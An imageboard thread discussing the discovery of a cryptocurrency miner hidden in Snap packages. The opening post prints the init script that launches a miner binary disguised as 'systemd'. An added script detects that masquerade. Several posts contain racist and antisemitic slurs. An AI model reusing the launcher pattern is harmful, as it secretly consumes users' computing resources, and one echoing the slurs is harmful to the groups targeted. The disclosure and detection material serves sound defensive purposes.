▶ No.913348>>913385 >>913658
Some Snaps (probably all) of Nicolas Tomb contain a miner! This is the content of the init script of the 2048buntu package:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
Issue on github:
https://github.com/canonical-websites/snapcraft.io/issues/651
All snaps of Nicolas Tomb:
https://uappexplorer.com/snaps?q=author%3ANicolas+Tomb&sort=-points
Edit.
All Snaps of that author were removed from the store.
▶ No.913349>>913352
The icing on this shit cake is that the binary was named "systemd" to fool users.
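Added example, not part of any post in this thread: a defender-side check for the trick described in the two posts above, a payload launched from `/snap/$name/current/systemd` and named after a core daemon. The trusted-path list assumes a Debian/Ubuntu layout, the function names are hypothetical, and the process lines are constructed sample input.

```bash
#!/bin/bash
# Flag processes whose executable is *named* systemd but is not at a path
# the distribution installs it to.
# Input (assumed format): "<pid> <exe-path> <args...>", one process per line.

# Assumption: genuine systemd locations on Debian/Ubuntu.
TRUSTED_SYSTEMD_PATHS="/lib/systemd/systemd /usr/lib/systemd/systemd"

find_masquerading() {
    local pid exe args trusted ok
    while read -r pid exe args; do
        [ -z "$pid" ] && continue
        # Only executables whose basename is exactly "systemd" are of interest.
        [ "${exe##*/}" = "systemd" ] || continue
        ok=0
        for trusted in $TRUSTED_SYSTEMD_PATHS; do
            [ "$exe" = "$trusted" ] && ok=1
        done
        [ "$ok" -eq 1 ] && continue
        # Report pid, path, and whether it runs out of a snap mount.
        case "$exe" in
            /snap/*) echo "$pid $exe snap" ;;
            *)       echo "$pid $exe other" ;;
        esac
    done
}

# Constructed sample input (not captured output). The second line mirrors the
# /snap/$name/current/systemd pattern from the init script quoted in the OP.
sample_processes() {
    cat <<'EOF'
1 /lib/systemd/systemd --system --deserialize 21
4242 /snap/2048buntu/current/systemd -u user@example.invalid --bcn 1
977 /usr/sbin/sshd -D
5150 /tmp/.cache/systemd --daemon
EOF
}

# On a live host, build the same three-column input from /proc.
live_processes() {
    local p exe
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        echo "${p#/proc/} $exe $(tr '\0' ' ' 2>/dev/null < "$p/cmdline")"
    done
}

sample_processes | find_masquerading
```

Run `live_processes | find_masquerading` as root to cover every process; executable paths containing spaces (for example a deleted binary shown as `... (deleted)`) would need a different column separator.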
▶ No.913351>>913357 >>913358
I've always been suspicious of Snaps and Flatpaks. Sounds like something right out of some shitty hipster startup from siliconeSJW valley. If your program requires some third party package distribution system then you might want to rethink your build system and dependency management. From wiki: The idea of using application containers in GNOME was first proposed in 2013 by Lennart Poettering. I knew it! Another great idea from our lord and savior Lennart.
▶ No.913352
>>913349
>it's systemd
>it must be good
The absolute state of systemd shills.
▶ No.913353>>913364
they wanted to shut down discussion on this one asap.
seems a little early, considering malware was just found in their repos.
▶ No.913357>>914153
>>913351
Flatpak and AppImage are no worse than .deb/RPM and tarballs from a security standpoint. As always, you bypass your package manager at your own risk.
▶ No.913358>>913362 >>913365
>>913351
The idea for distro-agnostic packages has been around longer than that. Ever heard of fatELF?
https://icculus.org/fatelf/
▶ No.913362>>929216
>>913358
I vaguely remember Icculus pushing this back in the day. I forget exactly why it got rejected. FatElf was basically the Windows way of doing things shoehorned into Unix/Linux. Then again, this IS the guy who invented Mojo installers.
▶ No.913364>>913377
>>913353
Kinda late though. This has already blown up on the Linux Leddit.
▶ No.913365>>913367 >>913368
>>913358
>distro-agnostic packages
how about statically compiling all the libraries into the binary?
is this not distro-agnostic? will this not run on the majority of distros with no dependency requirements?
i realize it's a pain in the ass to compile and results in an extremely bloated executable but who cares if some fuck is too lazy to install dependencies then he gets this.
▶ No.913367>>913386 >>914276
>>913365
glibc's static linking fucking sucks
▶ No.913368>>913386
>>913365
There is a good reason FatElf was rejected by Linus, whereas AppImage and Flatpak get his support.
▶ No.913371
▶ No.913374>>913456
>myfirstferrari
i hope they run him down
▶ No.913377>>913380
>>913364
>Leddit
link?
could not find anything about it, was it already deleted?
▶ No.913380>>913387 >>913388
▶ No.913382>>913394
Flatpak and AppImage have made life sticking to LTS releases MUCH easier. But yeah, we are going to have to hold Canonical and the Flathub guys to account when shit like this happens.
▶ No.913385
>>913348 (OP)
>some consumer mishmash crapware has malware in it
well i mean, it was indistinguishable from malware in the first place but okay
▶ No.913386>>914276
>>913368
i'm not talking about fatelf. i'm not talking about multiple architectures, arm, x86, etc, in the same binary, just regular static compiled x86 binaries.
>>913367
what are the problems? i've only done it a couple of times and given I didn't test the result on 10 different distributions but i've never had problems.
▶ No.913387>>913389
>>913380
great, here's the solution. we need the equivalent of pozjew and chromium's forced add-on signing even for shit that isn't in the appstore, now on your desktop.
we need a bunch of kikes to sit and moderate software that is specifically not in the moderated package repositories. surely this will go well. this nigger did this on purpose to bring down censorship on flatpack and snaps or whatever the fuck else.
▶ No.913388>>913390 >>913636
>>913380
every time i go to reddit my blood pressure goes up 20 points.
▶ No.913389>>913395
>>913387
That isn't really technically possible though. I mean, you could make users jump through an extra hoop I suppose.
▶ No.913390>>913391
>>913388
I mean, depending on how old your distro is, compiling a new version of foo might not be an option. That said, I imagine this is how most casual Linux users see things.
▶ No.913391>>913392 >>913631
>>913390
i would say i'm too used to gentoo, but it's not difficult on debian/jewbuntu either.
apt-get build-dep poosoft
apt-get source poosoft
tar -xzf poosoft
cd poosoft
./configure
make -j1
checkinstall poosoft
▶ No.913392
>>913391
Not everything is that trivial to compile though.
▶ No.913394>>913398 >>913954
>>913382
Flathub hasn't had anything like this happen though. From here on, I'd say AppImage is a more likely Trojan horse for this kind of mining malware.
▶ No.913395
>>913389
it wouldn't surprise me if canonical patched the kernel to include a kosher signing check before every executable runs.
▶ No.913398
>>913394
That wouldn't have stopped this though. THEY are the ones who allowed it in their repo in the first place.
▶ No.913421>>913422
This is what you get for using proprietary software.
▶ No.913422>>913429
>>913421
The binary blob was snuck into the package. 2048 itself is free software.
▶ No.913429>>913432 >>913465 >>913509
This was inevitable, Canonical and the "Year of the Linux Desktop" faggots want Windows but the street cred of Linux, so they will turn GNU/Linux into Windows with all the malware. Android/Linux has the same problem even though Google has full control there, you just can't make sure that a proprietary blob is not malicious. But the business models of the platform owners rests on the masses executing arbitrary code from third parties so they will just sacrifice some suckers and pull the malware when there is an outcry.
>>913422
Not the snap version, thanks to submissive license.
▶ No.913432
>>913429
Snap is actually geared more to IOT than the Desktop. One of the main reasons they think it's better than Flatpak is because Flatpak actually is centered around desktop use cases.
▶ No.913456
>>913374
I wonder if they can find out exactly who this is.
▶ No.913465
>>913429
>submissive license
cuck licenses btfo again
▶ No.913509
>>913429
Common sense should avoid most of this shit though. Don't download the Krita AppImage from anyplace besides the Krita official or anywhere else they endorse.
▶ No.913631>>913635 >>913972
>>913391
>error : poosoft requires shitlib >= 1.3.37, found : 0.1
and of course upgrading to a new version of shitlib breaks five dozen other applications. Granted, you could compile the new shitlib and statically link against that, but you'll have to compile seven more dependencies for it, one of them requiring very exotic compiler flags to not crash every other minute.
▶ No.913635>>913972
>>913631
>and of course upgrading to a new version of shitlib
You can have multiple versions of the same library installed at the same time.
▶ No.913636>>913700
>>913388
What is wrong with compiling yourself only as the last resort? Not every software is as trivial as
./configure && make && make install
▶ No.913641>>913724
The problem here is that no one audits the packages submitted to the Snap store, not Snap itself.
You can be sure that this has happened with PPA and AUR but nobody ever realized.
▶ No.913652
>obvious leddit copy-paste thread without archive links
>ByteCoin (BCN) has a nigger and a sandnigger in its developer team, and the overall community manager is likely a kike
>BCN is accused of being a (((scamcoin))) multiple times
▶ No.913658>>913661 >>913701 >>913709
>>913348 (OP)
>linux gets no viruses
▶ No.913661
>>913658
Never was this logical. Any package can contain a virus. Or even a python script you've downloaded from somewhere.
▶ No.913700
>>913636
Never mind how much longer it can take for larger applications like the GIMP or Kdenlive.
▶ No.913701
>>913658
*Malware. Viruses replicate themselves into other systems. And ANY operating system can have malware made for it.
▶ No.913709>>913715
>>913658
Who told you that? It just has less relevant vulnerabilities and is less affected by malware.
▶ No.913715>>913953
▶ No.913724
>>913641
>it would have been stopped by audits
lol
▶ No.913856>>913867
Just when I was about to try out Kubuntu.
Did it come preinstalled?
▶ No.913867
>>913856
Snap comes preinstalled. These packages didn't.
This is only slightly more remarkable than "malware found on Google Play".
▶ No.913932>>913936 >>913971
gg freetards. If you pay for software, you don't get malware. Remember, if you're not the customer, you're the product.
▶ No.913936
>>913932
also remember to not use paid software which is proprietary. They can double dip with you being both the customer AND the product (without you even knowing it).
▶ No.913953
>>913715
And here's why you're retarded
>Linux hardly has any viruses. And that’s not like “Oh well, not very often, you know”. That’s like “If you’ve ever heard of a real Linux virus, please tell me”. Of course, a Linux virus is not impossible to get. However, Linux makes it very hard for this to happen, for several reasons:
Learn to read dumbfuck
>hardly has
>very hard for this to happen
>not impossible to get
▶ No.913954>>913974
>>913394
Keep posting these sexy women
▶ No.913971
>>913932
Most proprietary software is malware. Doesn't matter if you pay for it or not.
▶ No.913972
>>913631
>>913635
>and of course upgrading to a new version of shitlib breaks five dozen other applications.
this is why you install gentoo
▶ No.913974>>914254
>>913954
You don't want that. Trust me.
▶ No.914153>>914505
>>913357
disgusting.
spoiler that shit.
▶ No.914254>>914327
>>913974
Do what I asked you to do pls
Also please include source
▶ No.914276
>>913367
You don't have to link against glibc. Link against musl or any non-bloated libc and it will still run in a glibc environment. The only thing a statically linked binary depends on is kernel interfaces being present, and we all know how autistic linus is about backwards compatibility (it's why linux is such a bloated piece of shit).
>>913386
>what are the problems?
Ulrich Drepper actively tries to make statically linking with glibc terrible. I can't find the articles right now though. In general however the meme about static linking producing huge binaries comes entirely from people linking against glibc. The smallest possible program ( int main() {} ) statically linked with glibc is >600K.
▶ No.914327>>914407
>>914254
Stop. You are hurting me.
▶ No.914407>>914471
▶ No.914471>>914533
>>914407
It's ShindoL, some of the tags from that doujin are: mind break, torture, moral degradation, moral degeneration, snuff, guru, blackmail, drugs, and incest. If that still interests you then have fun anon.
▶ No.914505>>914542
>>914153
You can always tell a newfag from the way they sperg about Libbie and Kiki. Most useful.
▶ No.914533
>>914471
H-How did you know those tags turn me on? A-Are you the botnet?
▶ No.914542>>914579
>>914505
I only sperg about nigger Libbie.
▶ No.914579>>914644 >>914648
>>914542
Didn't do well in maff class, white boy?
▶ No.914644
>>914579
How is it possible to do well with a teacher like THAT? My grades would be solely determined by 'extracurricular activities'
▶ No.914648>>914714 >>931154
>>914579
To you this is an improvement of an actual nigger.
To me this is bestiality squared.
▶ No.914714
>>914648
Whatever you say, new friend.
▶ No.922141
Learn about the [code] tags, retard
▶ No.929209
▶ No.929216
>>913362
>fatelf
Nice pic related
▶ No.929838>>929844
You could have avoided this if you'd used the Guix package manager.
▶ No.929844
>>929838
Hipster trash worse than a toy package manager.
▶ No.929930
am I the only one who anticipates the massive hit of botnet coin miners?
sure sucks to be notech and normal at the botnet age
▶ No.931154
>>914648
I dunno, Maff seems alright to me.
▶ No.931176>>931182
Solution: Don't use Snappy, a package manager designed for proprietary, walled garden bullshit.
▶ No.931182
>>931176
Flatpak is currently more popular with most OSS application devs atm anyway.